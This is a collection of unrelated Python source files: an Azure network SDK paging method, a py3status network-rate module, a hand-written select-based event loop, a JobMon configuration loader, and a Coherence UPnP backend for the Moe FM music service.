:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.RouteFilterRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_route_filter.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('RouteFilterRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_route_filter.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules'} # type: ignore
| |
# -*- coding: utf-8 -*-
"""
Display network transfer rate.
Configuration parameters:
all_interfaces: ignore self.interfaces, but not self.interfaces_blacklist
(default True)
cache_timeout: how often we refresh this module in seconds
(default 2)
devfile: location of dev file under /proc
(default '/proc/net/dev')
format: format of the module output
(default '{interface}: {total}')
format_no_connection: when there is no data transmitted from the start of the plugin
(default '')
format_value: format to use for values
(default "[\?min_length=11 {value:.1f} {unit}]")
hide_if_zero: hide indicator if rate == 0
(default False)
interfaces: comma separated list of interfaces to track
(default [])
interfaces_blacklist: comma separated list of interfaces to ignore
(default 'lo')
si_units: use SI units
(default False)
sum_values: sum values of each interface instead of taking the top one
(default False)
thresholds: specify color thresholds to use
(default [(0, 'bad'), (1024, 'degraded'), (1024 * 1024, 'good')])
unit: unit to use. If the unit contains a multiplier prefix, only this
exact unit will ever be used
(default "B/s")
Format placeholders:
{down} download rate
{interface} name of interface
{total} total rate
{up} upload rate
format_value placeholders:
{unit} current unit
{value} numeric value
Color thresholds:
{down} Change color based on the value of down
{total} Change color based on the value of total
{up} Change color based on the value of up
@author shadowprince
@license Eclipse Public License
SAMPLE OUTPUT
{'full_text': 'eno1: 852.2 KiB/s'}
"""
from __future__ import division # python2 compatibility
from time import time
class Py3status:
"""
"""
# available configuration parameters
all_interfaces = True
cache_timeout = 2
devfile = "/proc/net/dev"
format = "{interface}: {total}"
format_no_connection = ""
format_value = "[\?min_length=11 {value:.1f} {unit}]"
hide_if_zero = False
interfaces = []
interfaces_blacklist = "lo"
si_units = False
sum_values = False
thresholds = [(0, "bad"), (1024, "degraded"), (1024 * 1024, "good")]
unit = "B/s"
class Meta:
def deprecate_function(config):
# support old thresholds
precision = config.get("precision", 1)
padding = 3 + 1 + precision + 1 + 5
format_value = "[\?min_length={padding} {{value:.{precision}f}} {{unit}}]".format(
padding=padding, precision=precision
)
return {"format_value": format_value}
deprecated = {
"function": [{"function": deprecate_function}],
"remove": [
{"param": "precision", "msg": "obsolete, use format_value instead"}
],
}
def post_config_hook(self):
# parse some configuration parameters
if not isinstance(self.interfaces, list):
self.interfaces = self.interfaces.split(",")
if not isinstance(self.interfaces_blacklist, list):
self.interfaces_blacklist = self.interfaces_blacklist.split(",")
placeholders = self.py3.get_placeholder_formats_list(self.format_value)
values = ["{%s}" % x[1] for x in placeholders if x[0] == "value"]
self._value_formats = values
# last
self.last_interface = None
self.last_stat = self._get_stat()
self.last_time = time()
self.thresholds_init = self.py3.get_color_names_list(self.format)
def net_rate(self):
network_stat = self._get_stat()
deltas = {}
try:
# time from previous check
current_time = time()
timedelta = current_time - self.last_time
# calculate deltas for all interfaces
for old, new in zip(self.last_stat, network_stat):
down = (int(new[1]) - int(old[1])) / timedelta
up = (int(new[9]) - int(old[9])) / timedelta
deltas[new[0]] = {"total": up + down, "up": up, "down": down}
# update last_ info
self.last_stat = network_stat
self.last_time = current_time
# get the interface with max rate
if self.sum_values:
interface = "sum"
sum_up = sum([itm["up"] for _, itm in deltas.items()])
sum_down = sum([itm["down"] for _, itm in deltas.items()])
deltas[interface] = {
"total": sum_up + sum_down,
"up": sum_up,
"down": sum_down,
}
else:
interface = max(deltas, key=lambda x: deltas[x]["total"])
# if there is no rate - show last active interface, or hide
# we need to check if it will be zero after it is formatted
# with the desired unit eg MB/s
total, _ = self.py3.format_units(
deltas[interface]["total"], unit=self.unit, si=self.si_units
)
values = [float(x.format(total)) for x in self._value_formats]
if max(values) == 0:
interface = self.last_interface
hide = self.hide_if_zero
# if there is - update last_interface
else:
self.last_interface = interface
hide = False
# get the deltas into variable
delta = deltas[interface] if interface else None
except (TypeError, ValueError, KeyError):
delta = None
interface = None
hide = self.hide_if_zero
response = {"cached_until": self.py3.time_in(self.cache_timeout)}
if hide:
response["full_text"] = ""
elif not interface:
response["full_text"] = self.format_no_connection
else:
for x in self.thresholds_init:
if x in delta:
self.py3.threshold_get_color(delta[x], x)
response["full_text"] = self.py3.safe_format(
self.format,
{
"down": self._format_value(delta["down"]),
"total": self._format_value(delta["total"]),
"up": self._format_value(delta["up"]),
"interface": interface[:-1],
},
)
return response
def _get_stat(self):
"""
Get statistics from devfile in list of lists of words
"""
def dev_filter(x):
# get first word and remove trailing interface number
x = x.strip().split(" ")[0][:-1]
if x in self.interfaces_blacklist:
return False
if self.all_interfaces:
return True
if x in self.interfaces:
return True
return False
# read devfile, skip two header files
x = filter(dev_filter, open(self.devfile).readlines()[2:])
try:
# split info into words, filter empty ones
return [list(filter(lambda x: x, _x.split(" "))) for _x in x]
except StopIteration:
return None
def _format_value(self, value):
"""
Return formatted string
"""
value, unit = self.py3.format_units(value, unit=self.unit, si=self.si_units)
return self.py3.safe_format(self.format_value, {"value": value, "unit": unit})
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
| |
import os
import heapq
import time
import threading
import select
import errno
local = threading.local()
import logging
def stop():
"""Stops the current event loop"""
current_event_loop().stop()
def call_later(when, method, *args):
return current_event_loop().call_later(when, method, *args)
def call_soon(method, *args):
return current_event_loop().call_soon(method, *args)
def call_soon_threadsafe(method, *args):
return current_event_loop().call_soon_threadsafe(method, *args)
def current_event_loop():
if not hasattr(local, 'event_loop'):
local.event_loop = EventLoop()
return local.event_loop
def add_reader(fd, callback, *args):
current_event_loop().add_reader(fd, callback, *args)
def remove_reader(fd):
current_event_loop().remove_reader(fd)
def remove_writer(fd):
current_event_loop().remove_writer(fd)
def run():
current_event_loop().run()
def fileno(fd):
if isinstance(fd, int):
return fd
else:
return fd.fileno()
# Note: this is a port of a run_loop I wrote 10 years ago,
# I've started adapting it to conform to http://www.python.org/dev/peps/pep-3156/
# which will be implemented for Python 3.4
# Who knows, maybe this could be used to backport this capabilities to older
# pythons.
# Anyway long story short the description and docs in this class methods
# may
class EventLoop(object):
"""An event loop that provides edge-triggered notifications.
This EventLoop monitors a series of file descriptors, timers and
OS signals for events.
Each pass through the EventLoop we check to see if any timer has
expired at which point we call the timer's timeout() method
giving the Timer an oprotunity to preform any neccary actions.
After notifying each expired Timer we calculate how long until
the next timer (if any) will expire.
We then ask the OS to put us to sleep until one or more of
our event sources has is ready or our timeout has expired.
When we wake up it's because one of our descriptors
are in the ready state, a timer has expired or both.
If one of our descriptors is ready we remove it from the list of
descriptors to be monitored and then notify the apportiate
callback/delegate that it can now read or write the descriptor
without blocking. Note: it's the responsabilty of the delegate
to ask the EventLoop to remonitor a descriptor
*NOTE* Above statement is incorrect,
And that's it the loop starts over if there are any timers or
descriptors left to be monitored.
You do not need to instatiate a EventLoop, there should only be
one per thread. To get the EventLoop for the current thread simply
call current_event_loop() like so
>>> import event_loop
>>> loop = event_loop.current_event_loop()
To determine if the EventLoop is running you can examine it's
running property, in this paticular case we're not running
>>> loop.running
False
To start the EventLoop you must call run(), this will block the
thread until the EventLoop runs out of things to montior. Since we
have nothing to montior calling run() will return right away.
>>> loop.run()
>>> loop.running
False
So we have a Timer, it has an attribute called timeOutCalled
which is currently false
>>> myTimer.timeOutCalled
False
We add it to the EventLoop then run the EventLoop
>>> timer = EventLoop.addTimer(myTimer)
>>> EventLoop.run()
And when the EventLoop completes our timer's timeout value should
have been called.
>>> myTimer.timeOutCalled
True
Noticed that the code returned imediatly because after signaling
this timer there was nothing else to monitor. Typically
applications that use a EventLoop will always ensure that there's
something to monitor. For instance we can make a component that
get's called once every millisecond for 10 miliseconds by simply
readding the Timer back to the EventLoop in the Timer's timeout
method like this.
>>> class HeartBeat:
... def __init__(self):
... self.time = time.time() + .01
... self.cancelled = self.called = False
... self.ticks = 0
... def on_timeout(self):
... self.ticks += 1
... if self.ticks < 10:
... self.time = time.time() + .01
... EventLoop.currentEventLoop().addTimer(self)
Notice in this example a couple of things, for one we set
HeartBeat.time to be the current time plus ".01". In other words
we want are timeout() method to be called 1 milisecond from
now. We keep track of how many times we're called, if it's less
than 10 we reschedule ourselves back in the current
EventLoop. This demonstrates how an object doesn't need to keep a
reference to the EventLoop to use it.
>>> timer = HeartBeat()
>>> timer.ticks
0
>>> timer = EventLoop.addTimer(timer)
>>> EventLoop.run()
>>> timer.ticks
10
Normally you wouldn't implement your own Timer class because
most of the basic ones that you'd need have already been
implemented for you like a DeferedCall which will run a specific
method after a certain delay and optionally repeat if neccesary.
"""
def __init__(self):
self.threadCallQueue = []
self.readers = {}
self.writers = {}
reader, writer = os.pipe()
self.waker = writer
self.waker_reader = Stream(reader)
self.add_reader(self.waker_reader, self.on_wakeup)
self.running = False
self.timers = []
@property
def log(self):
return logging
def add_reader(self, fd, callback, *args):
self.readers[fileno(fd)] = (callback, args)
def remove_reader(self, fd):
del self.readers[fileno(fd)]
def add_writer(self, fd, callback, *args):
self.writers[fileno(fd)] = (callback, args)
def remove_writer(self, fd):
del self.writers[fileno(fd)]
def reset(self):
self.running = False
self.readers = {}
self.writers = {}
self.timers = []
self.threadCallQueue = []
self.waker_reader.read(1)
def _shouldRun(self,timerCapacity):
# Internal method, determines if the EventLoop should be stooped.
# EventLoop.run() will call this method with a value of 0,
# indicating that if there are any timers, then the EventLoop
# should continue until they fire
# EventLoop.runUntil() will call this method with a value of
# one, indicating that there must be more than 1 timer, or
# else the EventLoop should quit. This is because runUntil()
# adds one timer to stop the EventLoop at the specified time,
# but this timer shouldn't be considered something that keeps
# the EventLoop going if there is no other activity to monitor.
# Keep calling the EventLoop until some one stops us, we
# have no timers or the readers and writers drops to 1
# (EventLoops keep one reader around to wake
# themselves up from a sleep)
return self.running and (len(self.readers) + len(self.writers) > 1 or
len(self.timers) > timerCapacity or self.threadCallQueue)
def quitOnExceptionHandler(self, exception):
self.log.exception("Caught unexpected error in RunOnce.")
self.stop()
handleException = quitOnExceptionHandler
def run(self, reset_on_stop=True):
"""Keeps the EventLoop going until it's explicitly stoped or it runs out
of things to monitor."""
if self.running:
raise RuntimeError("EventLoop is already running.")
else:
self.running = True
while self.running: #self._shouldRun(0):
try:
self.runOnce()
except Exception, e:
self.handleException(e)
if reset_on_stop:
self.reset()
def runUntil(self, stopDate=None, **kw):
"""Runs the EventLoop until the given time plus interval have been
reached or it runs out of things to monitor. This method
should not be called when the EventLoop is already running.
The current time is assumed, if no date time is passed in.
Examples:(note, these aren't real doctests yet)
Run until a given date, say St. Patty's day
>> date=datetime.datetime(2007, 03,17, 17,00)
>> EventLoop.currentEventLoop().runUntil(dateAndTime)
Additionally you can pass in any keyword argument normally
taken by daetutilse.relativedelta to derive the date. These
include:
years, months, weeks, days, hours, minutes, seconds, microseconds
These are moste useful when you want to compute the relative
offset from now. For example to run the EventLoop for 5 seconds
you could do this.
>> EventLoop.currentEventLoop().runUntil(seconds=5)
Or, probably not as practical but still possible, wait one
year and 3 days
>> EventLoop.currentEventLoop().runUntil(years=1, days=3)
"""
if self.running:
raise RuntimeError("EventLoop is already running.")
else:
self.running = True
delta = relativedelta(**kw)
now = datetime.datetime.now()
if stopDate is None:
stopDate = now
stopDate = now + delta
# convert the time back into seconds since the epoch,
# subtract now from it, and this will then be the delay we
# can use
seconds2Run = time.mktime(stopDate.timetuple()) - time.mktime(now.timetuple())
self.waitBeforeCalling(seconds2Run, self.stop)
while self._shouldRun(1):
try:
self.runOnce()
except:
self.log.exception("Caught unexpected error in RunOnce.")
self.reset()
def runOnce(self):
# call every fucnction that was queued via callFromThread up
# until this point, but nothing more. If not we could be
# stuck doing this forever and never getting to the other calls
pending = len(self.threadCallQueue)
tried = 0
try:
for (f, a, kw) in self.threadCallQueue[:pending]:
tried += 1
f(*a, **kw)
finally:
# it's possible that more calls could have came in since we
# started, bu they should be on the end of the list
del self.threadCallQueue[:tried]
# we sleep until we either receive data or our earliest
# timer has expired.
currentTime = time.time()
# fire every timer that's expired
while self.timers:
timer = heapq.heappop(self.timers)
if timer.cancelled:
continue
timeout = timer.time - currentTime
if timeout <= 0:
# it's expired call it
timer.on_timeout()
else:
# this timer hasn't expired put it back on the list
heapq.heappush(self.timers, timer)
break
else:
if (len(self.readers) + len(self.writers)) < 1:
# we don't have any timers, if we're not monitoring
# any descriptors we need to bail
return
else:
# no timed events but we have file descriptors
# to monitor so sleep until they have
# activity.
timeout = None
try:
ready2Read, ready2Write, hadErrors =\
select.select(self.readers.keys(),
self.writers.keys(),
[], timeout)
except (select.error, IOError), e:
if e.args[0] == errno.EINTR:
# a signal interupted our select, hopefully
# someone eles is handling signals and using
# callFromeThread to do the right thing.
return
elif e.args[0] == errno.EBADF:
# ugh
self.clear_bad_descriptor()
return
else:
raise
while ready2Read or ready2Write or hadErrors:
# note the popping alows us not get hung up doing all reads all writes
# at once, not sure how useful this is.
if ready2Read:
fileno = ready2Read.pop()
callback, args = self.readers[fileno]#.pop(fileno)
callback(*args)
if ready2Write:
writer = ready2Write.pop()
# writer may have been removed by a callback in ready to read
# hence the do nothing default
callback, args = self.writers.get(writer, (lambda:None,[]))
callback(*args)
# writers, when ready will always be ready. To
# avoid an infinite loop an app that wishes to
# read the data they must call addWriter()
# again
def stop(self):
# drop us out of the run loop on it's next pass
self.running = False
self.wakeup()
def addTimer(self, timer):
heapq.heappush(self.timers, timer)
self.wakeup()
# we return the timer for convienance sake
return timer
def wakeup(self):
os.write(self.waker, 'x') # write one byte to wake up the EventLoop
def on_wakeup(self):
# we've been woken up, ignore the data and readAgain which
# should schedule us once more back in the EventLoop
self.waker_reader.read(1)
def call_later(self, seconds, method, *args, **kw):
# Create a non repeating event
dc = DelayedCall(seconds, method, *args, **kw)
self.addTimer(dc)
return dc
def call_soon(self, callback, *args):
return self.call_later(0, callback, *args)
def call_soon_threadsafe(self, f, *args):
assert callable(f), "%s is not callable" % f
self.threadCallQueue.append((f, args, kw))
self.wakeup()
def intervalBetweenCalling(self, secondsOrRRule, method, *args, **kw):
# Create a repeating event, this method can be called
# either with the number of seconds between each call or
# it can be passed a string or dateutil.rrule
t = type(secondsOrRRule)
# Convert to an RRULe if it's a string or a number
if t in (int, float):
rule = rrule.rrule(rrule.SECONDLY, interval=secondsOrRRule)
elif isinstance(secondsOrRRule, basestring):
rule = rrule.rrulestr(secondsOrRRule)
else:
# hopefully it's an object that returns an iteration of datetime objects
rule = secondsOrRRule
dc = DelayedCall(iter(rule), method, *args, **kw)
self.addTimer(dc)
return dc
def clear_bad_descriptor(self):
# ugh not pretty when this happens
for key in self.readers.keys():
try:
select.select([key],[],[], 0)
except Exception, e:
bad = self.readers.pop(key)
bad.onError(e)
for key in self.writers.keys():
try:
select.select([],[key],[], 0)
except Exception, e:
bad = self.writers.pop(key)
bad.onError(e)
class DelayedCall:
def __init__(self, secondsOrRRule, func, *args, **kw):
self.repeatRule = None
try:
self.time = time.time() + secondsOrRRule
except TypeError:
# it's not a number of seconds hopefully it's an rrule that's been converted to a generator
self.repeatRule = secondsOrRRule
dt = self.repeatRule.next()
self.time = time.mktime(dt.timetuple()) #time.time() + self.delay
self.cancelled = self.called = False
self.func = func
self.args = args
self.kw = kw
self.delayed_time = 0
def __cmp__(self, other):
return cmp(self.time, other.time)
def on_timeout(self):
if not self.cancelled:
self.func(*self.args, **self.kw)
if self.repeatRule:
try:
dt = self.repeatRule.next()
self.time = time.mktime(dt.timetuple()) #time.time() + self.delay
current_event_loop().addTimer(self)
except StopIteration: # rule has been exhausted
pass
def cancel(self):
"""Unschedule this call
@raise AlreadyCancelled: Raised if this call has already been
unscheduled.
@raise AlreadyCalled: Raised if this call has already been made.
"""
if self.cancelled:
raise RuntimeError("Already Cancelled")
elif self.called:
raise RuntimeError("Already Called")
else:
self.cancelled = True
del self.func, self.args, self.kw
class Future(object):
counter = 0
def __init__(self):
Future.counter += 1
self.id = Future.counter
from .transports import Stream
| |
"""
JobMon Configuration Handling
=============================
Implements configuration file reading and validation, which includes:
- Configuration options for the supervisor itself.
- Configuration options for individual jobs.
- The ability to load jobs from multiple files.
Typically, the use for this module is simply::
>>> config_handler = ConfigHandler()
>>> config_handler.load(SOME_FILE)
"""
import glob
import json
import logging
import os
import signal
import string
from jobmon import monitor
# Get the names for both signals and log levels so that way the configuration
# file authors do not have to reference those constants numerically.
SIGNAL_NAMES = {
sig_name: getattr(signal, sig_name) for sig_name in dir(signal)
# All of the signals are named consistently in the signal module, but some
# constants (SIG_IGN, SIG_BLOCK, etc.) are named 'SIG*' but which are not
# actually signals
if sig_name.startswith('SIG') and '_' not in sig_name
}
LOG_LEVELS = {
log_level: getattr(logging, log_level)
for log_level in ('CRITICAL', 'DEBUG', 'ERROR', 'FATAL', 'INFO', 'WARN',
'WARNING')
}
def expand_path_vars(path):
"""
Expands a path variable which uses $-style substitutions.
:func:`os.path.expandvars` doesn't have any way to escape the substitutions
unlike :class:`string.Template`, so we have to do the substitutions manually.
"""
template = string.Template(path)
return template.safe_substitute(os.environ)
class ConfigHandler:
"""
Reads, stores, and validates configuration options.
- :attr:`jobs` maps each job name to a
:class:`jobmon.monitor.ChlidProcesSkeleton`.
- :attr:`working_dir` stores the supervisor's working directory.
- :attr:`control_port` stores the port number which is used for commands.
- :attr:`event_port` stores the port number which is used for events.
- :attr:`log_level` stores the logging level for the supervisor's logging
output.
- :attr:`log_file` stores the path where the supervisor's logging output
will be written.
- :attr:`autostarts` stores a list of jobs to start immediately.
- :attr:`restarts` lists the jobs which are restarted automatically.
"""
def __init__(self):
self.jobs = {}
self.logger = logging.getLogger('config')
self.working_dir = '.'
self.control_port = 6666
self.event_port = 6667
self.includes = []
self.log_level = logging.WARNING
self.log_file = '/dev/null'
self.autostarts = []
self.restarts = []
def read_type(self, dct, key, expected_type, default=None):
"""
Reads a value from a dictionary. If it is of the expected type, then
that value is returned - otherwise, a default value is returned
instead.
:param dict dct: The JSON object to read the information from.
:param str key: The name of the value to read.
:param type expected_type: The expected type of the value.
:param default: The default value.
"""
value = dct[key]
if not isinstance(value, expected_type):
self.logger.error('Expected "%s" to be a %s, but got a %s instead',
key, expected_type, value)
return default
return value
def load(self, config_file):
"""
Loads the main jobs file, extracting information from both the main
configuration file and any included jobs files.
:param str config_file: The path to the configuration file to load.
"""
self.logger.info('Loading main configuration file "%s"', config_file)
with open(config_file) as config:
config_info = json.load(config)
if 'supervisor' in config_info:
if not isinstance(config_info['supervisor'], dict):
self.logger.warning('supervisor configuration is not a hash')
else:
self.handle_supervisor_config(config_info['supervisor'])
if 'jobs' in config_info:
if not isinstance(config_info['jobs'], dict):
self.logger.warning('jobs configuration is not a hash')
else:
self.handle_jobs(config_info['jobs'])
if not self.jobs:
self.logger.error('No jobs are configured, aborting')
raise ValueError
def handle_supervisor_config(self, supervisor_map):
"""
Parses out the options meant for the supervisor.
:param dict supervisor_map: A dictionary of options.
"""
if 'working-dir' in supervisor_map:
self.working_dir = expand_path_vars(
self.read_type(supervisor_map, 'working-dir', str,
self.working_dir))
if 'control-port' in supervisor_map:
self.control_port = self.read_type(supervisor_map, 'control-port', int,
self.control_port)
if 'event-port' in supervisor_map:
self.event_port = self.read_type(supervisor_map, 'event-port', int,
self.event_port)
if 'include-dirs' in supervisor_map:
self.includes = self.read_type(supervisor_map, 'include-dirs',
list, self.includes)
if 'log-level' in supervisor_map:
log_level_name = self.read_type(supervisor_map, 'log-level', str,
None)
if log_level_name is not None:
log_level_name = log_level_name.upper()
if log_level_name in LOG_LEVELS:
self.log_level = LOG_LEVELS[log_level_name]
else:
self.logger.warning('%s is not a valid self.logger.level', log_level_name)
if 'log-file' in supervisor_map:
self.log_file = expand_path_vars(
self.read_type(supervisor_map, 'log-file', str,
self.log_file))
included_jobfiles = []
for include_glob in self.includes:
self.logger.info('Expanding glob "%s"', include_glob)
globs = glob.glob(expand_path_vars(include_glob))
included_jobfiles += globs
for filename in globs:
self.logger.info('- Got file "%s"', filename)
for filename in included_jobfiles:
try:
self.logger.info('Loading job file "%s"', filename)
with open(filename) as jobfile:
jobs_map = json.load(jobfile)
if not isinstance(jobs_map, dict):
self.logger.warning('"%s" is not a valid jobs file', filename)
else:
self.handle_jobs(jobs_map)
except OSError as ex:
self.logger.warning('Unable to open "%s" - %s', filename, ex)
raise ValueError('No jobs defined - cannot continue')
def handle_jobs(self, jobs_map):
"""
Parses out a group of jobs.
:param dict jobs_map: A dictionary of jobs, indexed by name.
"""
for job_name, job in jobs_map.items():
self.logger.info('Parsing info for %s', job_name)
if 'command' not in job:
self.logger.warning('Continuing - %s lacks a command', job_name)
continue
if job_name in self.jobs:
self.logger.warning('Continuing - job %s is a duplicate', job_name)
continue
process = monitor.ChildProcessSkeleton(job_name, job['command'])
if 'stdin' in job:
default_value = process.stdin
process.config(stdin=expand_path_vars(
self.read_type(job, 'stdin', str, default_value)))
if 'stdout' in job:
default_value = process.stdout
process.config(stdout=expand_path_vars(
self.read_type(job, 'stdout', str, default_value)))
if 'stderr' in job:
default_value = process.stderr
process.config(stderr=expand_path_vars(
self.read_type(job, 'stderr', str, default_value)))
if 'env' in job:
default_value = process.env
process.config(env=self.read_type(job, 'env', dict, default_value))
if 'working-dir' in job:
default_value = process.working_dir
process.config(cwd=expand_path_vars(
self.read_type(job, 'working-dir', str, default_value)))
if 'signal' in job:
default_value = process.exit_signal
sig_name = self.read_type(job, 'signal', str, default_value)
sig_name = sig_name.upper()
if sig_name not in SIGNAL_NAMES:
self.logger.warning('%s it not a valid signal name', sig_name)
else:
process.config(sig=SIGNAL_NAMES[sig_name])
if 'autostart' in job:
should_autostart = self.read_type(job, 'autostart', bool, False)
if should_autostart:
self.autostarts.append(job_name)
if 'restart' in job:
should_restart = self.read_type(job, 'restart', bool, False)
if should_restart:
self.restarts.append(job_name)
self.jobs[job_name] = process
| |
from __future__ import print_function, unicode_literals
import re
import itertools
from HTMLParser import HTMLParser
from coherence import log
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.utils import ReverseProxyUriResource
from coherence.upnp.core.DIDLLite import (
Resource,
)
from coherence.backend import (
BackendItem, Container, AbstractBackendStore,
)
import api
import settings
_htmlparser = HTMLParser()
class MoeFmProxyStream(ReverseProxyUriResource, log.Loggable):
logCategory = 'moefm_stream'
def __init__(self, uri, parent):
self.parent = parent
ReverseProxyUriResource.__init__(self, uri.encode("utf-8"))
def log_playing(self):
if self.parent.store.last_played_item is self:
obj_id = self.parent.sub_id
d = api.moefm.get(
"/ajax/log?log_obj_type=sub&log_type=listen&obj_type=song&api=json", # noqa
{"obj_id": obj_id}
)
d.addCallback(lambda res: self.debug(
"Logged %s: %r", obj_id, res,
))
d.addErrback(lambda res: self.warning(
"Unable to log %s: %r", obj_id, res,
))
def render(self, request):
self.debug("render %r", self.parent.item_data)
self.parent.container.on_item_play(self.parent)
self.parent.store.last_played_item = self
reactor.callLater(self.parent.duration_seconds / 2, self.log_playing)
return ReverseProxyUriResource.render(self, request)
class MoeFmTrack(BackendItem):
logCategory = "moefm"
next_sn = 0
def __init__(self, item_data, container):
BackendItem.__init__(self)
self.item_data = item_data
self.container = container
self.sub_id = item_data["sub_id"]
self.storage_id = "track-%s$%s" % (self.sub_id, container.get_id())
self.__class__.next_sn += 1
self.sort_key = self.__class__.next_sn
track_number = None
m = re.match(
r"^song\.(\d+)\s+.*$",
_htmlparser.unescape(item_data["title"]),
re.I,
)
if m:
track_number, = m.groups()
title = _htmlparser.unescape(item_data["sub_title"])
self.name = title
self.title = title
self.originalTrackNumber = track_number
self.artist = _htmlparser.unescape(item_data["artist"])
self.album = _htmlparser.unescape(item_data["wiki_title"])
self.cover = item_data["cover"]["large"]
self.duration = item_data["stream_time"]
self.duration_seconds = int(item_data["stream_length"])
if not re.match(r"^\d{2}:\d{2}:\d{2}(?:\.\d+)?", self.duration):
self.duration = "0:" + self.duration # Add hour part
self.mimetype = "audio/mpeg"
self.item = None
def get_id(self):
return self.storage_id
def get_item(self):
if self.item is None:
upnp_id = self.get_id()
upnp_parent_id = self.parent.get_id()
self.debug("get_item %s %s %s", upnp_id, upnp_parent_id, self.name)
item = DIDLLite.MusicTrack(upnp_id, upnp_parent_id, self.name)
item.restricted = True
item.name = self.name
item.originalTrackNumber = self.originalTrackNumber
item.title = self.title
item.artist = self.artist
item.album = self.album
item.albumArtURI = self.cover
item.duration = self.duration
proxied_url = "%s%s" % (self.store.urlbase, self.get_id())
proxied_url = proxied_url.encode("utf-8")
self.url = proxied_url
self.location = MoeFmProxyStream(self.item_data["url"], self)
protocol = "http-get"
res = Resource(
proxied_url,
("%s:*:%s:*" % (protocol, self.mimetype)).encode("utf-8")
)
res.size = self.item_data["file_size"] * 1024
res.duration = self.duration
item.res.append(res)
self.item = item
return self.item
def get_url(self):
return self.url
class MoeFmTrackContainer(Container):
logCategory = "moefm_track_container"
ContainerClass = DIDLLite.PlaylistContainer
preferred_id = None
def __init__(self, store, parent, title, api_params=None):
super(MoeFmTrackContainer, self).__init__(parent, title)
self.sorting_method = lambda x, y: cmp(x.sort_key, y.sort_key)
self.store = store
self.api_params = api_params if api_params is not None else {}
self.loaded = False
if self.preferred_id:
self.storage_id = self.preferred_id
if store.get_by_id(self.storage_id):
self.storage_id += "$" + parent.get_id()
def get_item(self):
if not self.loaded:
return self.load_tracks().addCallback(lambda _: self.get_item())
if self.item is None:
self.item = self.ContainerClass(
self.storage_id, self.parent_id, self.name
)
self.item.childCount = self.get_child_count()
return self.item
def get_children(self, *args, **kwargs):
if not self.loaded:
return self.load_tracks().addCallback(
lambda _: self.get_children(*args, **kwargs)
)
return super(MoeFmTrackContainer, self).get_children(*args, **kwargs)
def get_api_params(self):
return self.api_params
def on_got_response(self, resp_container):
self.info("Got response")
resp = resp_container["response"]
self.debug("Information: %r", resp["information"])
if resp["information"]["has_error"]:
self.error("Got error response: %s" % resp)
return
items = []
existing_ids = set(x.sub_id for x in self.children)
for item_data in resp["playlist"]:
item = MoeFmTrack(item_data, self)
if item.sub_id in existing_ids:
continue
items.append(item)
self.add_child(item)
self.on_update_completed()
self.loaded = True
return items
def on_got_error(self, error):
self.warning("Unable to retrieve tracks: %s", error)
return error
def load_tracks(self):
params = {"perpage": settings.get("tracks_per_request", 30)}
params.update(self.get_api_params())
d = api.moefm.get("/listen/playlist?api=json", params)
return d.addCallbacks(self.on_got_response, self.on_got_error)
def on_update_completed(self):
self.update_id += 1
self.store.on_update_completed(self)
def on_item_play(self, item):
pass
class MoeFmMultiPageTrackContainer(MoeFmTrackContainer):
def __init__(self, *args, **kwargs):
super(MoeFmMultiPageTrackContainer, self).__init__(*args, **kwargs)
self.current_page = 1
@property
def should_load_next_page(self):
return True
def load_tracks(self):
def on_completed(items):
if items:
self.current_page += 1
if items and self.should_load_next_page:
return self.load_tracks().addCallback(
lambda x: itertools.chain(x, items)
)
else:
return items
d = super(MoeFmMultiPageTrackContainer, self).load_tracks()
return d.addCallback(on_completed)
def get_api_params(self):
params = super(MoeFmMultiPageTrackContainer, self).get_api_params()
params["page"] = self.current_page
return params
class MoeFmRandomPlaylist(MoeFmMultiPageTrackContainer):
preferred_id = "magic"
def __init__(self, store, parent):
super(MoeFmRandomPlaylist, self).__init__(store, parent, "Magic")
def remove_child(self, child, external_id=None, update=True):
try:
self.children.remove(child)
# We'd like the item to be accessible even after removing it
# self.store.remove_item(child)
except ValueError:
pass
else:
if update:
self.update_id += 1
@property
def need_more_tracks(self):
current_count = self.get_child_count()
return current_count < settings.get("min_tracks_in_playlist", 120)
@property
def should_load_next_page(self):
return self.need_more_tracks
@property
def loaded(self):
return not self.need_more_tracks
loaded = loaded.setter(lambda self, value: None)
def on_item_play(self, item):
self.remove_child(item)
self.on_update_completed()
class MoeFmPlaylistStore(AbstractBackendStore):
logCategory = "moefm"
name = "Moe FM"
implements = ["MediaServer"]
wmc_mapping = {"16": 1000}
def __init__(self, server, **kwargs):
AbstractBackendStore.__init__(self, server, **kwargs)
self.init_completed()
def __repr__(self):
return self.__class__.__name__
def append_item(self, item, storage_id=None):
if storage_id is None:
